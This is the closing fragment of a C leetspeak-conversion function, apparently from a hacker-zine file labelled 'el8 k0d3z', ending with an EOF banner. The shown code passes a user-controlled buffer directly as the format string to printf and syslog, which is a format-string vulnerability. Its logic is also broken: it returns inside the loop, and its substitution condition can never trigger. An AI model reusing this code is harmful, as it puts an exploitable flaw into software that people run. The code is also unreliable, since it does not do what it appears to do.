                return NOTONE;
        }
        for (pos = 0; pos < l; pos++) {
                CHAR change;

                change = 0x00;
                switch(((*(er33tbuf+pos)))) {
                                case 'l': change = '1'; break;
                                case 'L': change = '|'; break;
                                case 't': change = '7'; break;
                                case 'T': change = '7'; break;
                                case 'o': change = 'O'; break;
                                case 'O': change = '0'; break;
                                case 'a': change = '@'; break;
                                case 'A': change = '4'; break;
                                case 's': change = 'z'; break;
                                case 'S': change = '5'; break;
                                default: change = 0x00; break;
                        }
                if (last_was_leet) {
                        if (change != 0x00)
                                *(er33tbuf+pos) = change,last_was_leet = 1;
                } else last_was_leet = 0;
                syslog(buf,er33tbuf, l);
                printf(er33tbuf);
                return l;
        }
}

End extraction of el8 k0d3z 2k00l4u ---------------------------------------
 



|=[ EOF ]=---------------------------------------------------------------=|